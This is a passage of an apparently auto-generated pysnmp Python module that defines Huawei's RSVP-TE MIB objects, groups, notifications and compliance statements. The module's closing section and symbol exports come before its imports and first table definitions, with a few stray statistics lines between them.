("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdMsgIdFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdMsgIdEpoch"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdMsgIdNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdRsvpHop"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeResvFwdGroup = hwRsvpTeResvFwdGroup.setStatus('current')
hwRsvpTeIfGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 5)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfUdpNbrs"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfIpNbrs"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrs"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRefreshBlockadeMultiple"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRefreshMultiple"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRefreshInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRouteDelay"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfUdpRequired"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfStatus"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfHelloEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfSrefreshEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfSrefreshInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRetranIncDelta"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRetranInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthEncrypted"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthHandshake"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthKey"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfWindowSize"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthLifeTime"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeIfGroup = hwRsvpTeIfGroup.setStatus('current')
hwRsvpTeNbrGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 6)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloSrcInstance"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloDstInstance"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloLostCounter"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrSendersNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrReceiversNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrCapability"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrRestartTime"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrRecoveryTime"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrStatus"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrAuthKeyId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrReductionEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrReliabilityEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrProtocol"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeNbrGroup = hwRsvpTeNbrGroup.setStatus('current')
hwRsvpTeMessageIdGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 7)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdFlag"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeMessageIdGroup = hwRsvpTeMessageIdGroup.setStatus('current')
hwRsvpTeFilterSpecGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 8)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecLspId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecIngressLsrId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecLabel"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeFilterSpecGroup = hwRsvpTeFilterSpecGroup.setStatus('current')
hwRsvpTeRroGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 9)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroIpAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroIpPrefixLen"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroLabel"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroFlag"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeRroGroup = hwRsvpTeRroGroup.setStatus('current')
hwRsvpTeEroGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 10)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroIpAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroIpPrefixLen"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeEroGroup = hwRsvpTeEroGroup.setStatus('current')
hwRsvpTeTrapObjectsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 11)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrCurrentCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThreshold"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeTrapObjectsGroup = hwRsvpTeTrapObjectsGroup.setStatus('current')
hwRsvpTeTrapGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 12)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeHelloLost"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeHelloLostRecovery"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeAuthFail"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeAuthSuccess"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThresholdExceed"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThresholdExceedClear"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCountExceed"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCountExceedClear"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeTrapGroup = hwRsvpTeTrapGroup.setStatus('current')
hwRsvpTeCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 2))
hwRsvpTeCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 2, 1)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeTrapObjectsGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeTrapGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeCompliance = hwRsvpTeCompliance.setStatus('current')
mibBuilder.exportSymbols("HUAWEI-RSVPTE-MIB", hwRsvpTeIfIpNbrs=hwRsvpTeIfIpNbrs, hwRsvpTeResvFwdTSpecMaxTu=hwRsvpTeResvFwdTSpecMaxTu, hwRsvpTeSenderAdspecGuaranteedHopCount=hwRsvpTeSenderAdspecGuaranteedHopCount, hwRsvpTeMessageIdFlag=hwRsvpTeMessageIdFlag, hwRsvpTeResvFwdSenderAddr=hwRsvpTeResvFwdSenderAddr, hwRsvpTeCompliances=hwRsvpTeCompliances, hwRsvpTeIfRefreshInterval=hwRsvpTeIfRefreshInterval, hwRsvpTeIfGroup=hwRsvpTeIfGroup, hwRsvpTeSenderSessionAttrIncludeAny=hwRsvpTeSenderSessionAttrIncludeAny, hwRsvpTeResvFwdTable=hwRsvpTeResvFwdTable, hwRsvpTeGroups=hwRsvpTeGroups, hwRsvpTeRroIpPrefixLen=hwRsvpTeRroIpPrefixLen, hwRsvpTeResvFwdSenderAddrLength=hwRsvpTeResvFwdSenderAddrLength, hwRsvpTeEroTable=hwRsvpTeEroTable, hwRsvpTeIfRefreshBlockadeMultiple=hwRsvpTeIfRefreshBlockadeMultiple, hwRsvpTeNbrGrRecoveryTime=hwRsvpTeNbrGrRecoveryTime, hwRsvpTeEroIpAddr=hwRsvpTeEroIpAddr, hwRsvpTeIfRouteDelay=hwRsvpTeIfRouteDelay, hwRsvpTeSenderAdspecCtrlLoadMtu=hwRsvpTeSenderAdspecCtrlLoadMtu, hwRsvpTeSessionRequests=hwRsvpTeSessionRequests, hwRsvpTeSessionSenders=hwRsvpTeSessionSenders, hwRsvpTeSenderEntry=hwRsvpTeSenderEntry, hwRsvpTeSenderRsvpHop=hwRsvpTeSenderRsvpHop, hwRsvpTeTrapGroup=hwRsvpTeTrapGroup, hwRsvpTeIfNbrCurrentCount=hwRsvpTeIfNbrCurrentCount, hwRsvpTeNbrProtocol=hwRsvpTeNbrProtocol, hwRsvpTeMessageIdTable=hwRsvpTeMessageIdTable, hwRsvpTeRroNumber=hwRsvpTeRroNumber, hwRsvpTeSenderLabelRequestFrMinDlci=hwRsvpTeSenderLabelRequestFrMinDlci, hwRsvpTeResvFwdDestAddr=hwRsvpTeResvFwdDestAddr, hwRsvpTeIfStatus=hwRsvpTeIfStatus, hwRsvpTeResvType=hwRsvpTeResvType, hwRsvpTeSessionDestAddr=hwRsvpTeSessionDestAddr, hwRsvpTeResvEntry=hwRsvpTeResvEntry, hwRsvpTeIfAuthEncrypted=hwRsvpTeIfAuthEncrypted, hwRsvpTeRroGroup=hwRsvpTeRroGroup, hwRsvpTeSenderType=hwRsvpTeSenderType, hwRsvpTeSenderFrrIncludeAny=hwRsvpTeSenderFrrIncludeAny, hwRsvpTeSenderSessionAttrType=hwRsvpTeSenderSessionAttrType, hwRsvpTeMessageIdNumber=hwRsvpTeMessageIdNumber, hwRsvpTeSenderLabelRequestAtmMaxVpi=hwRsvpTeSenderLabelRequestAtmMaxVpi, hwRsvpTeFilterSpecIngressLsrId=hwRsvpTeFilterSpecIngressLsrId, hwRsvpTeRroEntry=hwRsvpTeRroEntry, hwRsvpTeResvFwdRSpecRate=hwRsvpTeResvFwdRSpecRate, hwRsvpTe=hwRsvpTe, hwRsvpTeResvFwdHopLih=hwRsvpTeResvFwdHopLih, hwRsvpTeNbrHelloDstInstance=hwRsvpTeNbrHelloDstInstance, hwRsvpTeSessionNumber=hwRsvpTeSessionNumber, hwRsvpTeSessionEntry=hwRsvpTeSessionEntry, hwRsvpTeSenderMsgIdSndNumber=hwRsvpTeSenderMsgIdSndNumber, hwRsvpTeIfUdpNbrs=hwRsvpTeIfUdpNbrs, hwRsvpTeResvShared=hwRsvpTeResvShared, hwRsvpTeSenderAdspecPathBw=hwRsvpTeSenderAdspecPathBw, hwRsvpTeIfRetranInterval=hwRsvpTeIfRetranInterval, hwRsvpTeFilterSpecTable=hwRsvpTeFilterSpecTable, hwRsvpTeResvScope=hwRsvpTeResvScope, hwRsvpTeNbrGroup=hwRsvpTeNbrGroup, hwRsvpTeCompliance=hwRsvpTeCompliance, hwRsvpTeSessionTable=hwRsvpTeSessionTable, hwRsvpTeNbrHelloSrcInstance=hwRsvpTeNbrHelloSrcInstance, hwRsvpTeEroType=hwRsvpTeEroType, hwRsvpTeSenderAdspecGuaranteedMinLatency=hwRsvpTeSenderAdspecGuaranteedMinLatency, hwRsvpTeAuthFail=hwRsvpTeAuthFail, hwRsvpTeSenderFrrInuseFlag=hwRsvpTeSenderFrrInuseFlag, hwRsvpTeSenderMsgIdRcvFlag=hwRsvpTeSenderMsgIdRcvFlag, hwRsvpTeResvFwdTSpecPeakRate=hwRsvpTeResvFwdTSpecPeakRate, hwRsvpTeResvService=hwRsvpTeResvService, hwRsvpTeResvPolicy=hwRsvpTeResvPolicy, hwRsvpTeNbrAuthKeyId=hwRsvpTeNbrAuthKeyId, hwRsvpTeRroLabel=hwRsvpTeRroLabel, hwRsvpTeSenderFrrIncludeAll=hwRsvpTeSenderFrrIncludeAll, hwRsvpTeSenderClassType=hwRsvpTeSenderClassType, hwRsvpTeSenderSessionAttrExcludeAny=hwRsvpTeSenderSessionAttrExcludeAny, hwRsvpTeIfAuthKey=hwRsvpTeIfAuthKey, hwRsvpTeSenderTSpecBurst=hwRsvpTeSenderTSpecBurst, hwRsvpTeIfNbrTotalCount=hwRsvpTeIfNbrTotalCount, hwRsvpTeIfNbrTotalCountExceedClear=hwRsvpTeIfNbrTotalCountExceedClear, hwRsvpTeSenderFrrExcludeAny=hwRsvpTeSenderFrrExcludeAny, hwRsvpTeResvConfirm=hwRsvpTeResvConfirm, hwRsvpTeResvDestAddr=hwRsvpTeResvDestAddr, hwRsvpTeResvFwdShared=hwRsvpTeResvFwdShared, hwRsvpTeHelloLostRecovery=hwRsvpTeHelloLostRecovery, hwRsvpTeResvTSpecRate=hwRsvpTeResvTSpecRate, hwRsvpTeSenderNumber=hwRsvpTeSenderNumber, hwRsvpTeSenderAdspecHopCount=hwRsvpTeSenderAdspecHopCount, hwRsvpTeSessionDestAddrLength=hwRsvpTeSessionDestAddrLength, hwRsvpTeSenderTable=hwRsvpTeSenderTable, hwRsvpTeSenderPolicy=hwRsvpTeSenderPolicy, hwRsvpTeSenderAdspecGuaranteedCtot=hwRsvpTeSenderAdspecGuaranteedCtot, hwRsvpTeResvFwdType=hwRsvpTeResvFwdType, hwRsvpTeNbrEntry=hwRsvpTeNbrEntry, hwRsvpTeSenderHopAddr=hwRsvpTeSenderHopAddr, hwRsvpTeSenderMsgIdSndEpoch=hwRsvpTeSenderMsgIdSndEpoch, hwRsvpTeSenderFrrBandwidth=hwRsvpTeSenderFrrBandwidth, hwRsvpTeSenderTSpecPeakRate=hwRsvpTeSenderTSpecPeakRate, hwRsvpTeSenderAddr=hwRsvpTeSenderAddr, hwRsvpTeSenderFrrHopLimit=hwRsvpTeSenderFrrHopLimit, hwRsvpTeSenderSessionAttrName=hwRsvpTeSenderSessionAttrName, hwRsvpTeResvSenderAddrLength=hwRsvpTeResvSenderAddrLength, hwRsvpTeResvInterface=hwRsvpTeResvInterface, hwRsvpTeResvRsvpHop=hwRsvpTeResvRsvpHop, hwRsvpTeResvFwdExplicit=hwRsvpTeResvFwdExplicit, hwRsvpTeIfTtl=hwRsvpTeIfTtl, hwRsvpTeResvFwdDestAddrLength=hwRsvpTeResvFwdDestAddrLength, hwRsvpTeResvTSpecBurst=hwRsvpTeResvTSpecBurst, hwRsvpTeRroIpAddr=hwRsvpTeRroIpAddr, hwRsvpTeNbrGrRestartTime=hwRsvpTeNbrGrRestartTime, hwRsvpTeResvTSpecMaxTu=hwRsvpTeResvTSpecMaxTu, hwRsvpTeNbr=hwRsvpTeNbr, hwRsvpTeSessionType=hwRsvpTeSessionType, hwRsvpTeIfAuthEnabled=hwRsvpTeIfAuthEnabled, hwRsvpTeFilterSpecLabel=hwRsvpTeFilterSpecLabel, PYSNMP_MODULE_ID=hwRsvpTe, hwRsvpTeResvFwdNumber=hwRsvpTeResvFwdNumber, hwRsvpTeExtendObjects=hwRsvpTeExtendObjects, hwRsvpTeIfName=hwRsvpTeIfName, hwRsvpTeIfSrefreshInterval=hwRsvpTeIfSrefreshInterval, hwRsvpTeSessionLspsNumber=hwRsvpTeSessionLspsNumber, hwRsvpTeSenderAdspecGuaranteedDsum=hwRsvpTeSenderAdspecGuaranteedDsum, hwRsvpTeSenderSessionAttrSetupPrio=hwRsvpTeSenderSessionAttrSetupPrio, hwRsvpTeSenderTSpecRate=hwRsvpTeSenderTSpecRate, hwRsvpTeSenderAdspecGuaranteedDtot=hwRsvpTeSenderAdspecGuaranteedDtot, hwRsvpTeSenderAdspecCtrlLoadSvc=hwRsvpTeSenderAdspecCtrlLoadSvc, hwRsvpTeResvGroup=hwRsvpTeResvGroup, hwRsvpTeSessionGroup=hwRsvpTeSessionGroup, hwRsvpTeRroFlag=hwRsvpTeRroFlag, hwRsvpTeResvExplicit=hwRsvpTeResvExplicit, hwRsvpTeIfNbrThreshold=hwRsvpTeIfNbrThreshold, hwRsvpTeRroTable=hwRsvpTeRroTable, hwRsvpTeRroType=hwRsvpTeRroType, hwRsvpTeSenderDestAddr=hwRsvpTeSenderDestAddr, hwRsvpTeEroEntry=hwRsvpTeEroEntry, hwRsvpTeSenderAdspecCtrlLoadPathBw=hwRsvpTeSenderAdspecCtrlLoadPathBw, hwRsvpTeResvFwdGroup=hwRsvpTeResvFwdGroup, hwRsvpTeTrapObjectsGroup=hwRsvpTeTrapObjectsGroup, hwRsvpTeResvTable=hwRsvpTeResvTable, hwRsvpTeIfRefreshMultiple=hwRsvpTeIfRefreshMultiple, hwRsvpTeSenderGroup=hwRsvpTeSenderGroup, hwRsvpTeFilterSpecGroup=hwRsvpTeFilterSpecGroup, hwRsvpTeEroGroup=hwRsvpTeEroGroup, hwRsvpTeResvSenderAddr=hwRsvpTeResvSenderAddr, hwRsvpTeNbrReceiversNumber=hwRsvpTeNbrReceiversNumber, hwRsvpTeNbrReliabilityEnabled=hwRsvpTeNbrReliabilityEnabled, hwRsvpTeNbrHelloEnabled=hwRsvpTeNbrHelloEnabled, hwRsvpTeNbrGrCapability=hwRsvpTeNbrGrCapability, hwRsvpTeResvTtl=hwRsvpTeResvTtl, hwRsvpTeSenderSessionAttrFlag=hwRsvpTeSenderSessionAttrFlag, hwRsvpTeResvTSpecMinTu=hwRsvpTeResvTSpecMinTu, hwRsvpTeSenderMsgIdRcvEpoch=hwRsvpTeSenderMsgIdRcvEpoch, hwRsvpTeIfWindowSize=hwRsvpTeIfWindowSize, hwRsvpTeSenderDiffServPsc=hwRsvpTeSenderDiffServPsc, hwRsvpTeMessageIdEpoch=hwRsvpTeMessageIdEpoch, hwRsvpTeNbrTable=hwRsvpTeNbrTable, hwRsvpTeNbrGrStatus=hwRsvpTeNbrGrStatus, hwRsvpTeSenderLabelRequestFrMaxDlci=hwRsvpTeSenderLabelRequestFrMaxDlci, hwRsvpTeSessionReceivers=hwRsvpTeSessionReceivers, hwRsvpTeResvFwdScope=hwRsvpTeResvFwdScope, hwRsvpTeSenderAdspecMtu=hwRsvpTeSenderAdspecMtu, hwRsvpTeSenderMsgIdSndFlag=hwRsvpTeSenderMsgIdSndFlag, hwRsvpTeSenderAdspecGuaranteedBreak=hwRsvpTeSenderAdspecGuaranteedBreak, hwRsvpTeResvTSpecPeakRate=hwRsvpTeResvTSpecPeakRate, hwRsvpTeIfRetranIncDelta=hwRsvpTeIfRetranIncDelta, hwRsvpTeSenderFrrFlag=hwRsvpTeSenderFrrFlag, hwRsvpTeResvFwdInterface=hwRsvpTeResvFwdInterface, hwRsvpTeSenderTtl=hwRsvpTeSenderTtl, hwRsvpTeSenderAdspecMinLatency=hwRsvpTeSenderAdspecMinLatency, hwRsvpTeResvFwdTtl=hwRsvpTeResvFwdTtl, hwRsvpTeSenderLabelRequestAtmMinVci=hwRsvpTeSenderLabelRequestAtmMinVci, hwRsvpTeResvFwdService=hwRsvpTeResvFwdService, hwRsvpTeSenderInterface=hwRsvpTeSenderInterface, hwRsvpTeSenderInterval=hwRsvpTeSenderInterval, hwRsvpTeResvFwdRsvpHop=hwRsvpTeResvFwdRsvpHop, hwRsvpTeEroIpPrefixLen=hwRsvpTeEroIpPrefixLen, hwRsvpTeResvFwdEntry=hwRsvpTeResvFwdEntry, hwRsvpTeLspId=hwRsvpTeLspId, hwRsvpTeResvFwdRSpecSlack=hwRsvpTeResvFwdRSpecSlack, hwRsvpTeResvRSpecSlack=hwRsvpTeResvRSpecSlack, hwRsvpTeResvFwdInterval=hwRsvpTeResvFwdInterval, hwRsvpTeResvFwdHopAddr=hwRsvpTeResvFwdHopAddr, hwRsvpTeSenderAdspecCtrlLoadBreak=hwRsvpTeSenderAdspecCtrlLoadBreak, hwRsvpTeResvFwdPolicy=hwRsvpTeResvFwdPolicy, hwRsvpTeConformance=hwRsvpTeConformance, hwRsvpTeSenderAdspecBreak=hwRsvpTeSenderAdspecBreak, hwRsvpTeResvFwdTSpecBurst=hwRsvpTeResvFwdTSpecBurst, hwRsvpTeResvFwdMsgIdNumber=hwRsvpTeResvFwdMsgIdNumber, hwRsvpTeExtendTrap=hwRsvpTeExtendTrap, hwRsvpTeAuthSuccess=hwRsvpTeAuthSuccess, hwRsvpTeFilterSpecNumber=hwRsvpTeFilterSpecNumber, hwRsvpTeIfNbrTotalCountExceed=hwRsvpTeIfNbrTotalCountExceed, hwRsvpTeSenderFrrSetupPrio=hwRsvpTeSenderFrrSetupPrio, hwRsvpTeResvHopLih=hwRsvpTeResvHopLih, hwRsvpTeIfEnabled=hwRsvpTeIfEnabled, hwRsvpTeIfTable=hwRsvpTeIfTable, hwRsvpTeIfHelloEnabled=hwRsvpTeIfHelloEnabled, hwRsvpTeIfAuthLifeTime=hwRsvpTeIfAuthLifeTime, hwRsvpTeSenderMsgIdRcvNumber=hwRsvpTeSenderMsgIdRcvNumber, hwRsvpTeResvFwdTSpecRate=hwRsvpTeResvFwdTSpecRate, hwRsvpTeSenderAdspecGuaranteedPathBw=hwRsvpTeSenderAdspecGuaranteedPathBw, hwRsvpTeResvDestAddrLength=hwRsvpTeResvDestAddrLength, hwRsvpTeNbrHelloLostCounter=hwRsvpTeNbrHelloLostCounter, hwRsvpTeSenderAdspecCtrlLoadHopCount=hwRsvpTeSenderAdspecCtrlLoadHopCount, hwRsvpTeHelloLost=hwRsvpTeHelloLost, hwRsvpTeIfUdpRequired=hwRsvpTeIfUdpRequired, hwRsvpTeNbrReductionEnabled=hwRsvpTeNbrReductionEnabled, hwRsvpTeSessionStyle=hwRsvpTeSessionStyle, hwRsvpTeNbrAddress=hwRsvpTeNbrAddress, hwRsvpTeNbrHelloType=hwRsvpTeNbrHelloType, hwRsvpTeSessionTunnelId=hwRsvpTeSessionTunnelId, hwRsvpTeIfSrefreshEnabled=hwRsvpTeIfSrefreshEnabled, hwRsvpTeEroNumber=hwRsvpTeEroNumber, hwRsvpTeSenderAdspecGuaranteedCsum=hwRsvpTeSenderAdspecGuaranteedCsum, hwRsvpTeSenderSessionAttrHoldPrio=hwRsvpTeSenderSessionAttrHoldPrio, hwRsvpTeSenderLabelRequestAtmMaxVci=hwRsvpTeSenderLabelRequestAtmMaxVci, hwRsvpTeSenderHopLih=hwRsvpTeSenderHopLih, hwRsvpTeFilterSpecLspId=hwRsvpTeFilterSpecLspId, hwRsvpTeSenderSessionAttrIncludeAll=hwRsvpTeSenderSessionAttrIncludeAll, hwRsvpTeSenderLabelRequestL3pid=hwRsvpTeSenderLabelRequestL3pid, hwRsvpTeSenderAdspecGuaranteedMtu=hwRsvpTeSenderAdspecGuaranteedMtu, hwRsvpTeResvNumber=hwRsvpTeResvNumber, hwRsvpTeTrapObjects=hwRsvpTeTrapObjects, hwRsvpTeResvFwdMsgIdEpoch=hwRsvpTeResvFwdMsgIdEpoch, hwRsvpTeSenderDestAddrLength=hwRsvpTeSenderDestAddrLength, hwRsvpTeIfAuthHandshake=hwRsvpTeIfAuthHandshake, hwRsvpTeSenderTSpecMaxTu=hwRsvpTeSenderTSpecMaxTu, hwRsvpTeSenderLabelRequestCtype=hwRsvpTeSenderLabelRequestCtype, hwRsvpTeObjects=hwRsvpTeObjects, hwRsvpTeIfNbrThresholdExceed=hwRsvpTeIfNbrThresholdExceed, hwRsvpTeResvFwdMsgIdFlag=hwRsvpTeResvFwdMsgIdFlag, hwRsvpTeResvInterval=hwRsvpTeResvInterval, hwRsvpTeSessionTunnelExtId=hwRsvpTeSessionTunnelExtId, hwRsvpTeMessageIdGroup=hwRsvpTeMessageIdGroup, hwRsvpTeSenderTSpecMinTu=hwRsvpTeSenderTSpecMinTu, hwRsvpTeResvRSpecRate=hwRsvpTeResvRSpecRate, hwRsvpTeSenderFrrHoldPrio=hwRsvpTeSenderFrrHoldPrio, hwRsvpTeResvFwdTSpecMinTu=hwRsvpTeResvFwdTSpecMinTu, hwRsvpTeNbrSendersNumber=hwRsvpTeNbrSendersNumber, hwRsvpTeIfEntry=hwRsvpTeIfEntry, hwRsvpTeSenderAdspecGuaranteedSvc=hwRsvpTeSenderAdspecGuaranteedSvc, hwRsvpTeMessageIdEntry=hwRsvpTeMessageIdEntry, hwRsvpTeFilterSpecEntry=hwRsvpTeFilterSpecEntry, hwRsvpTeTrap=hwRsvpTeTrap, hwRsvpTeNbrStatus=hwRsvpTeNbrStatus, hwRsvpTeSenderAdspecCtrlLoadMinLatency=hwRsvpTeSenderAdspecCtrlLoadMinLatency, hwRsvpTeIfNbrs=hwRsvpTeIfNbrs, hwRsvpTeIfNbrThresholdExceedClear=hwRsvpTeIfNbrThresholdExceedClear, hwRsvpTeResvHopAddr=hwRsvpTeResvHopAddr, hwRsvpTeSenderLabelRequestAtmMinVpi=hwRsvpTeSenderLabelRequestAtmMinVpi, hwRsvpTeSenderAddrLength=hwRsvpTeSenderAddrLength)
| 149.703846
| 12,243
| 0.770675
|
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsUnion")
hwDatacomm, = mibBuilder.importSymbols("HUAWEI-MIB", "hwDatacomm")
ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex")
BitRate, MessageSize, QosService, BurstSize, SessionType = mibBuilder.importSymbols("INTEGRATED-SERVICES-MIB", "BitRate", "MessageSize", "QosService", "BurstSize", "SessionType")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
Integer32, Unsigned32, MibIdentifier, Counter64, Counter32, TimeTicks, IpAddress, ModuleIdentity, iso, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, ObjectIdentity, NotificationType, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "Unsigned32", "MibIdentifier", "Counter64", "Counter32", "TimeTicks", "IpAddress", "ModuleIdentity", "iso", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ObjectIdentity", "NotificationType", "Bits")
DisplayString, TruthValue, TimeStamp, TimeInterval, TextualConvention, RowStatus = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TruthValue", "TimeStamp", "TimeInterval", "TextualConvention", "RowStatus")
hwRsvpTe = ModuleIdentity((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148))
hwRsvpTe.setRevisions(('2014-10-25 17:36', '2014-06-16 14:55', '2013-08-28 17:55',))
if mibBuilder.loadTexts: hwRsvpTe.setLastUpdated('201410251736Z')
if mibBuilder.loadTexts: hwRsvpTe.setOrganization('Huawei Technologies Co.,Ltd.')
hwRsvpTeObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1))
hwRsvpTeSessionTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1), )
if mibBuilder.loadTexts: hwRsvpTeSessionTable.setStatus('current')
hwRsvpTeSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"))
if mibBuilder.loadTexts: hwRsvpTeSessionEntry.setStatus('current')
